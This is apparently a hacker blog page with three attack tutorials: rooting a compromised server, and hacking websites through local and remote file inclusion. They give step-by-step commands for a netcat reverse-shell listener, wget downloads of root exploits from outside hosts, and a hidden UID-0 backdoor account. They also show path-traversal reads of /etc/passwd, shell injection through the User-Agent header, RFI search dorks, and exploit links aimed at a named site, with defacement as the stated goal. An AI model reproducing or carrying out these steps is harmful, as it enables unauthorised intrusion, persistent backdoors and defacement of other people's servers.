★☆★rooting Tutorial ★☆★


DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



★☆★ Server r00ting ★☆★
So let's start with things you will need:

 1) Shelled website 
2) Local root exploit 
3) NetCat 

 Chapter 1 - Gathering informations

 Open up your .php shell on a hacked webserver.
I have mine for an example

 Now you need to check what kernel your slave is using...
It should be something like 

 Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14Server r00ting21 EST 2007 i686

 Next thing you wanna do is to look for an local root exploit.
From example provided mine one is 2.6.18-8.el5 #1 SMP Fri Jan 26 14Server r00ting21 EST 2007 i686.
Here's the list of exploits
http://pastebin.com/JRTMWBDh

 NOTE: If your webserver have 2.6.18 2011 kernel,then you have 0.0001% chances that you will root it,because there's no public exploit for that version.
Chapter 2 - Backconnecting to the server
For this you will need:

 1) NetCat
2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)
So open your netcat and type:
-l -n -v -p 443
Hit "Enter"
Now it should write "listening on [any] 443 ..."
Good.
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".

Now it should connect to your netcat 
I got something like this
Chapter 3 - Downloading exploit and executing it
Now we will need our exploit from Chapter 1
There's 2 way of uploading:

 1) Using shell uploader Rolleyes 
2) Using 'wget' function (Requires backconnection)

 I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:
Now it downloaded out exploit named "2.6.18-164.zip" on our server.

 If your exploit is downloaded as anyrandomname.c you must compile it
Do do that first download that exploit and then type:

 gcc anyrandomname.c -o anyrandomname
And our exploit is compiled. (If you get errors when compiling then find another exploit)
If you downloaded your exploit in zip file anyrandomname.zip type:

 unzip anyrandomname.zip
Now you should have your exploit (Like mine "2.6.18-164")

 If you completed all steps it's time to get root.

 Type:

 chmod 777 yourexploit'sname
With common sense where i typed "yourexploit'sname" you will type your exploit's name.

 And one last final step is to run our exploit
./yourexploit'sname
To check if you got root type

 id
or 
whoami

 Mine steps to root
Chapter 4 - Adding root user
Adding new root user is fairly easy
We use this command:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

 Command explanations:
Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.

 -u 0 -o - Set the value of user id to 0.

 -g 0 - Set the initial group number or name to 0

 -G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

 -M - 'home directory' not created for the user.

 root2 - User name of the new user account.NOTE: Change root2 to your desired username.

 Now you need to set a password for your username.
Type in next:
passwd Root2

 (Root2 is your username)

 See an example

 [root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

 To check if you did alright

 id root2
(Root2 is your username)
Google - http://google.com
NetCat - http://downloadnetcat.com/nc11nt.zip




READMORE
Posted by juh-pkshadow at 04:43 0 comments

 

Local File Inclusion

LFI : Local File Inclusion 

Attacks are occur in the web application when the parameters are not checked properly and checked before being used to include the files. By this vulnerability flow Attacker can see the arbitrary files on the directory and even can deface the site by uploading the Shell by this over flow.
So Now we will learn How To Hack a Website with LFI Method
Things you require :-
LFI Vulnerable site:
User-Agent Switcher = https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ 
A remote shell
So Lets Begin.....
This is a Vulnerable link :- www.lamesite.com/index.php?id=page.php so we will check our LFI exploit code on this site. Then our vulnerable link will be like this :- www.lamesite.com/index.php?id=../../../../../../../../../../../../../../etc/passwd . Now will open the proc/etc/environ .
www.lamesite.com/index.php?id=./../../../../../../../../../../../../../proc/self/environ .
Now we will upload the shell in the Vulnerable site.
First of all download the User-Agent Switcher and Open it and click on new>New User-Agent

 After opening the New User Agent ( You will get the screen like below screenshot ) Then in User Agent replace that with
” ” without quotes and give the description whatever you like and click on Ok then refresh the {age you will get the PHP info file open in the Tab.

 NOw again go to Agent users and replace the User Agent with and click ok.
( http://www.sh3ll.org/egy.txt you can put your remote shell link nad -O will convert the shell in shell.php )
Now we have successfully uploaded the shell in the site. You will get the shell link like this www.lamesite.com/shell.php .
That’s it. I hope you all will like the tutorial and don’t forget to share it :)

READMORE
Posted by juh-pkshadow at 05:33 0 comments

 

Remote File Inclusion


RFI ( Remote File Inclusion ) 

 is a method of injecting the remote file link to the server and get the site access. By this vulnerability attacker can deface or compromise the data from the site.
* Before getting start ( Things required )
A shell uploaded in any webhosting try my3gb( dot )com ( Any shell you like )
Vulnerable site
A sharp brain ;)
Mostly Used Dorks for RFI :-
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
How to Hack website using RFI method
After uploading the shell in the hosting get it’s link eg:- username.my3gb.com/shell_name.php . Now it’s for the Vulnerable site.
You can get them by Using dorks. I am using this site :- http://www.cbspk.com
Here’s the vulnerable the link of the site :- http://www.cbspk.com/v2/index.php?page=site link here.
now to check whether the site is vulnerable or not you have to put the any site link after ?page= for example :-
http://www.cbspk.com/v2/index.php?page=http://google.com
If it will open google.com in the same page then it’s vulnerable and if it didn’t then check any other site.

 Now after getting the vulnerable site replace the http://google.com with your shell link. Now exploit link will be :-
http://www.cbspk.com/v2/index.php?page=http://username.my3gb.com/shell.php?
And add ? also to the link if the site is vulnerable it will embedded the page to the site.
After successfully execution. The only thing left is your creativity Defacing ;) 
Hope you enjoyed the tutorial ” How to hack a website using RFI method “  and don’forget to share it

READMORE
Posted by juh-pkshadow at 05:28 0 comments

 
Subscribe to: Comments (Atom)